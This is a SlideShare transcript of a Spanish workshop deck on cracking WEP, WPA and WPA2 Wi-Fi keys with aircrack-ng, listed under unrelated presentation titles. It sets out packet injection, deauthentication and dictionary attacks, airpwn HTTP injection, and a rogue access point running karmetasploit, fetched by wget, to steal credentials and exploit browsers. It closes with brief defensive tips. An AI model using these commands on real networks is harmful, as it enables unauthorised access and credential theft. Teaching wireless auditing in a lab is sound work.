Segunda ley de la termodinámica TERMODINAMICA.pptxSegunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptxMariaBurgos55
 
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptx
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptxGoogle-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptx
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptxAlexander López
 
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptxEl_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptxAlexander López
 
Mapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptxMapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptxMidwarHenryLOZAFLORE
 
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).ppt
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).pptLUXOMETRO EN SALUD OCUPACIONAL(FINAL).ppt
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).pptchaverriemily794
 
El uso de las tic en la vida ,lo importante que son
El uso de las tic en la vida ,lo importante  que sonEl uso de las tic en la vida ,lo importante  que son
El uso de las tic en la vida ,lo importante que son241514984
 
Hernandez_Hernandez_Practica web de la sesion 11.pptx
Hernandez_Hernandez_Practica web de la sesion 11.pptxHernandez_Hernandez_Practica web de la sesion 11.pptx
Hernandez_Hernandez_Practica web de la sesion 11.pptxJOSEMANUELHERNANDEZH11
 

Dernier (20)

Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxMedidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
 
definicion segun autores de matemáticas educativa
definicion segun autores de matemáticas  educativadefinicion segun autores de matemáticas  educativa
definicion segun autores de matemáticas educativa
 
Arenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxArenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptx
 
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6    CREAR UN RECURSO MULTIMEDIAActividad integradora 6    CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
 
Excel (1) tecnologia.pdf trabajo Excel taller
Excel  (1) tecnologia.pdf trabajo Excel tallerExcel  (1) tecnologia.pdf trabajo Excel taller
Excel (1) tecnologia.pdf trabajo Excel taller
 
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptxLAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
 
Explorando la historia y funcionamiento de la memoria ram
Explorando la historia y funcionamiento de la memoria ramExplorando la historia y funcionamiento de la memoria ram
Explorando la historia y funcionamiento de la memoria ram
 
GonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptxGonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptx
 
El uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELEl uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFEL
 
La Electricidad Y La Electrónica Trabajo Tecnología.pdf
La Electricidad Y La Electrónica Trabajo Tecnología.pdfLa Electricidad Y La Electrónica Trabajo Tecnología.pdf
La Electricidad Y La Electrónica Trabajo Tecnología.pdf
 
Tecnologias Starlink para el mundo tec.pptx
Tecnologias Starlink para el mundo tec.pptxTecnologias Starlink para el mundo tec.pptx
Tecnologias Starlink para el mundo tec.pptx
 
Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadPresentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidad
 
FloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptxFloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptx
 
Segunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptxSegunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptx
 
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptx
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptxGoogle-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptx
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptx
 
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptxEl_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
 
Mapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptxMapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptx
 
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).ppt
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).pptLUXOMETRO EN SALUD OCUPACIONAL(FINAL).ppt
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).ppt
 
El uso de las tic en la vida ,lo importante que son
El uso de las tic en la vida ,lo importante  que sonEl uso de las tic en la vida ,lo importante  que son
El uso de las tic en la vida ,lo importante que son
 
Hernandez_Hernandez_Practica web de la sesion 11.pptx
Hernandez_Hernandez_Practica web de la sesion 11.pptxHernandez_Hernandez_Practica web de la sesion 11.pptx
Hernandez_Hernandez_Practica web de la sesion 11.pptx
 

Auditar redes inalámbricas WEP, WPA y WPA2

  • 2. Agenda del Workshop • ¿Cuál es tu SSID? • ¿Porqué el WorkShop? • ¿Como vamos a trabajar? • Manos a la Obra!!
  • 3. ¿Cuál es tu SSID? Jaime Andrés María Valentina Jairo ……
  • 4. ¿Por que el Workshop? • Gran porcentaje de implementaciones inalámbricas. • Poco interés por la seguridad en redes inalámbricas, en entornos caseros y empresariales. • Desconocimiento de los problemas de seguridad en redes inalámbricas
  • 5. ¿Cómo vamos a Trabajar? •  GRUPO II SSID: (WEP-II, WEP-ST-II, WPA-II, WPA2-II) Mac: F0:7D:68:52:AA:07 •  GRUPO I SSID: (WEP,WEP-ST,WPA,WPA2) Mac: 00:1B:11:3A:B6:9D
  • 6. Manos a la obra!! • Inicia la maquina virtual o introduce el DVD • Ingresa el usuario root y clave toor, luego startx • Conecta la memoria Wireless USB, si la tienes. Si no tienes una tarjeta compatible.. No te preocupes
  • 7. WEP
  • 8. start-network iwconfig Iniciando la red y configurando la tarjeta
  • 9. airmon-ng start wlan0 Ponemos nuestra tarjeta inalámbrica en modo monitor.
  • 10. airodump-ng mon0 Iniciamos una captura general de trafico, para identificar las redes activas a las que tenemos alcance.
  • 11. Con los resultados del comando anterior, podemos identificar varias redes e información que será muy importante para poder descifrar la clave de la red inalámbrica.
  • 12. airodump-ng -c CANAL --bssid MACROUTER -w NOMBRE mon0 Ponemos nuestra tarjeta inalámbrica a capturar la información especifica que nos interesa, de la red inalámbrica que seleccionamos anteriormente.
  • 13. Iniciamos la captura y podemos ver los usuarios conectados, cuantos paquetes ha enviado y capturamos esos paquetes en el archivo WEP.cap
  • 14. aircrack-ng WEP-01.cap Ejecutamos el aircrack para sacar la clave de la red, que se encuentra en los paquetes que capturamos anteriormente.
  • 16. En la anterior captura, es en un entorno donde hay clientes conectados y haciendo uso de la red. Pero… ¿y si no hay trafico?
  • 17. Identificamos la red que deseamos auditar y obtenemos la información que será importante para poder descifrar la clave de la red inalámbrica.
  • 18. Si hay clientes pero no hay trafico Pocos datos Identificamos un cliente conectado a la red, pero no esta navegando y no conseguimos muchos datos.
  • 19. Pocos datos y solo 12 IVs (vector de inicialización), necesitaremos al menos 5000 Intentamos crackear la clave con los pocos paquetes que logramos conseguir y nos dice que necesitamos muchos mas paquetes ¿Qué hacemos?
  • 20. airodump-ng -c 6 --bssid MACROUTER -w WEP-ST mon0 Como el cliente que tenemos conectado a la red, no esta navegando, vamos a capturar algún paquete que envié el cliente, suplantarlo y reenviarlo muchas veces trafico al router. aireplay-ng -3 -b MACROUTER -h MACCLIENTE mon0
  • 21. Logramos una buena cantidad de datos Conseguimos capturar un paquete del cliente y repetirlo muchas veces para generar trafico suplantando el cliente legitimo ante el router. Paquetes que inyectamos
  • 22. 28059 IVs, contra 12 que teníamos…. Después de inyectar todos esos paquetes, ya contamos con los suficientes vectores para crackear la clave como ya lo hicimos anteriormente. aircrack-ng WEP-ST-01.cap
  • 25. WPA
  • 26. airodump-ng mon0 Iniciamos una captura general de trafico, para identificar las redes WPA activas a las que tenemos alcance.
  • 27. Ponemos nuestra tarjeta inalámbrica a capturar la información especifica que nos interesa, de la red inalámbrica que seleccionamos anteriormente. airodump-ng -c CANAL --bssid MACROUTER -w NOMBRE mon0
  • 28. Iniciamos la captura y podemos ver los usuarios conectados, cuantos paquetes ha enviado y capturamos esos paquetes en el archivo WPA.cap
  • 29. Tenemos muy buenos datos, pero… Al ejecutar aircrack-ng WPA-01.cap, nos encontramos con 0 handshake Como WPA se crackea, por fuerza bruta y no descifrando la clave como WEP, no nos importa los datos sino el “apretón de manos” inicial entre el pc y el router (handshake)
  • 30. Ponemos a capturar… airepaly-ng -0 1 –a MACROUTER –c MACCLIENTE mon0 En esta ocasión lo que nos importa es capturar por la el “apretón de manos” donde se ponen de acuerdo cliente y servidor de la forma en que trabajaran, esta información la usaremos para crackear la clave wifi por fuerza bruta.
  • 31. aircrack-ng WPA-01.cap Lanzamos el aircrack a el archivo .cap generado, para verificar que efectivamente contemos con el handshake (apretón de manos) y podemos empezar a lanzar el ataque de fuerza bruta.
  • 32. aircrack-ng -w /pentest/passwords/wordlists/wpa.txt -b 00:1B:3A:B6:9D WPA-01.cap Lanzamos el ataque de fuerza bruta con el diccionario que trae incorporado el backtrack y esperamos que alguna de las claves que estén en el, sea la del router.
  • 33. Después de casi 14 minutos, obtenemos la clave del router, que en este caso era !n5en5!7!v!7y KEY FOUND!, encontramos la clave de la red WPA, después ya que afortunadamente estaba en el diccionario de password que utilizamos.
  • 35. airodump-ng -c CANAL --bssid MACROUTER -w NOMBRE mon0 airodump-ng mon0 airepaly-ng -0 1 –a MACROUTER –c MACCLIENTE mon0
  • 36. aircrack-ng -w /pentest/ passwords/wordlists/ darkc0de.lst -b 00:1B: 11:3A:B6:9D WPA2-01.cap Paramos el ataque de des autenticación y verificamos que tenemos el handshake Iniciamos el crackeo de la contraseña por fuerza bruta
  • 37. Después de casi 2 horas, obtenemos la clave del router, que en este caso era ecuatoriano KEY FOUND!, encontramos la clave de la red WPA2, ya que afortunadamente estaba en el diccionario de password que utilizamos.
  • 40. Que hago después de entrar a la red…
  • 43. Pero también podemos… • Escanear la red en busca de equipos con información o vulnerables. • Lanzar un ataque ARP Spoofing para capturar los datos que corren por esa red inalámbrica. • Usar su infraestructura, impresoras, conexión a internet y aplicaciones locales. • Cualquier otra cosa que se nos ocurra…
  • 46. airpwn Framework wireless que permite inyectar paquetes entrantes, que encajen con un patrón que definamos en el archivo de configuración.
  • 47. airpwn –d DRIVER –i mon0 –k CLAVEWEPHEXA –c CONFIGURACION –vvv -F Iniciamos la herramienta con una configuración personalizada que nos permitirá reemplazar cualquier petición HTTP del cliente por la nuestra.
  • 50. airmon-ng start wlan0 Airbase-ng –P –C 30 –e ^”WPA” –v mon0 Ponemos nuestra tarjeta en modo monitor e iniciamos un accesspoint con un essid conocido…
  • 51. nano /etc/dhcp3/dhcpd.conf option domain-name-servers 10.0.0.1; default-lease-time 60; max-lease-time 72; ddns-update-style none; authoritative; log-facility local7; subnet 10.0.0.0 netmask 255.255.255.0 { range 10.0.0.100 10.0.0.254; option routers 10.0.0.1; option domain-name-servers 10.0.0.1; }
  • 52. ifconfig at0 up 10.0.0.1 netmask 255.255.255.0 /etc/init.d/dhcp3-server start
  • 53. wget http://digitaloffense.net/tools/karma.rc ./msfconsole –r karma.rc Descargamos el karmetasploit de la pagina oficial, lo ejecutamos y esperamos que cargue completamente
  • 54. Oye tu eres mi red? Claro yo soy tu red Comunícame por fa con pop.hotmail.com Yo soy pop.hotmail.com, ¿cual es tu usuario y clave? Mi usuario es inocencia y mi clave 123456 Muchas gracias inocencia, espera yo verifico tus datos Atacante Victima
  • 55. El resultado que veremos en los clientes que se conecten a nuestro falso access point, depende de los servicios que le solicite el cliente al karmetasploit. Si solicita un cliente pop3,ftp,dns,smb, simula ser uno y almacena los datos que proporcione el cliente en la base de datos karma.db Si hacemos una petición http en cambio nos ejecuta el modulo browser_autopwn del metasploit, para tratar de explotar alguna vulnerabilidad en nuestro navegador y conseguir una shell en el sistema.
  • 57. ¿Como podemos protégenos? •  Cambiar clave por defecto y SSID (preferiblemente ocúltelo) al router •  Usar WPA o WPA2 con clave fuerte. •  Realizar Filtrado por Mac y limitar el numero de conexiones •  Bajar la potencia a nuestro router •  Apagar el router cuando no se utilice •  Usar pintura DefendAir
  • 58.